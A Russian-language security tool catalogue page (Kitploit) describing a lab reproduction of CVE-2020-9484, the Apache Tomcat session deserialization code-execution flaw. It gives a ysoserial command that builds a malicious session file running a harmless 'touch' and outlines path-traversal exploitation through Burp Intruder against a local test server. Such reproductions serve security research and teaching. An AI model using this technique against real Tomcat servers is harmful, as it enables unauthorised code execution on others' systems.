Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-9484 — Воспроизведение уязвимости выполнения кода при десериализации сессий Apache Tomcat с помощью Kali 2.0 | Kitploit
Инструменты/GitHubGitHub/idealdreamlast/cve-2020-9484
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubidealdreamlast/cve-2020-9484

CVE-2020-9484

Воспроизведение уязвимости выполнения кода при десериализации сессий Apache Tomcat с помощью Kali 2.0

Репозиторий
52206 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-9484

Воспроизведение уязвимости удалённого выполнения кода при десериализации сессий Apache Tomcat (CVE-2020-9484) с помощью Kali 2.0

Окружение:

  1. Kali 2.0
  2. apache-tomcat-7.0.61-CVE-2020-9484.tar.gz (веб-приложение — s2-053, в его каталог lib добавлен commons-collections4-4.0.jar)

Запуск

/yourtomcatdir/bin/startup.sh image

Генерация payload

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session

Эксплуатация

Сначала откройте S2-053, чтобы убедиться, что он запущен корректно: http://192.168.152.128:8080/s2-053/ image
Повторно откройте страницу, перехватите запрос и с помощью Intruder выполните обход пути (path traversal) image
image


Команда выполнена успешно: image



Ссылка: https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg
Скачать инструмент